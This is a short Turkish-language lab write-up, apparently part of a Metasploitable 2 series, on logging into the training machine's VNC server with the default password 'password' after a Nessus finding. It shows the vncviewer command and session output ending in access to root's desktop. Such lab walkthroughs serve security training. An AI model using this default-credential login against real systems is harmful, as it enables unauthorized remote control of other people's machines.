Metasploitable 2 Exploit Vnc

Exploit #4 : VNC

Nessus taramasında VNC Server ‘password’ Password isminde kritik bir zafiyet keşfetti.

Açıklamada nessusun parola olarak “password” ile vnc bağlantısı yapabildiği belirtiliyor.

Linux komut satırında vncviever 172.16.52.133 password:password ile sisteme direk olarak login olunabilir.

#vncviewer 172.16.52.133

Connected to RFB server, using protocol version 3.3

Performing standard VNC authentication

Password:

Authentication successful

Desktop name “root’s X desktop (metasploitable:0)”

VNC server default format:

 32 bits per pixel.

 Least significant byte first in each pixel.

 True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

Using default colormap which is TrueColor.  Pixel format:

 32 bits per pixel.

 Least significant byte first in each pixel.